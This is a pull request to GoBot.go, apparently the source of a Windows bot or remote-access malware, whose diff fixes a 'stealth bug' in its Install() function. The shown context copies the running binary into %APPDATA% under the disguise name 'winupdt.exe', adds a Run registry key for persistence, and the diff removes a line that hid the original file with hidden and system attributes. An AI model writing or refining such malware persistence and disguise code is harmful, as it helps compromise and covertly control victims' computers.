### PR TITLE
Stealth bug

### DIFF
--- a/GoBot.go
+++ b/GoBot.go
@@ -311,7 +311,6 @@ func Install() {
 		run("mkdir %APPDATA%\\Windows_Update")
 		run("copy " + os.Args[0] + " %APPDATA%\\Windows_Update\\winupdt.exe")
 		run("REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Windows_Update /t REG_SZ /F /D %APPDATA%\\Windows_Update\\winupdt.exe")
-		run("attrib +H +S " + os.Args[0])
 	}
 }
 //================================================================================


### PR DESCRIPTION
Even if stealth was disabled, it would still be applied to the installation. Removing this line fixes that.
